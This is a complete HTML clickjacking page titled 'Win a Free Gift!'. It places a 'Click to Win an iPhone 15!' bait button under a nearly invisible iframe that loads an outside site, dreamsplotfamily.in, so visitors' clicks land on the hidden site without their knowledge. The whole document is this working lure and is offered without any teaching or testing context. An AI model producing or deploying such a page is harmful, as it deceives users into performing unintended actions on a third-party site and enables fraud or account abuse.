<!DOCTYPE html>
<html>
<head>
    <title>Win a Free Gift!</title>
    <style>
        #bait {
            position: absolute;
            top: 100px;
            left: 100px;
            z-index: 2;
            font-size: 20px;
            background: yellow;
            padding: 10px;
        }

        iframe {
            position: absolute;
            top: 100px;
            left: 100px;
            width: 400px;
            height: 200px;
            opacity: 0.01; /* makes iframe invisible */
            z-index: 3;
            border: none;
        }
    </style>
</head>
<body>
    <div id="bait">🎁 Click to Win an iPhone 15!</div>
    <iframe src="https://dreamsplotfamily.in"></iframe>
</body>
</html>
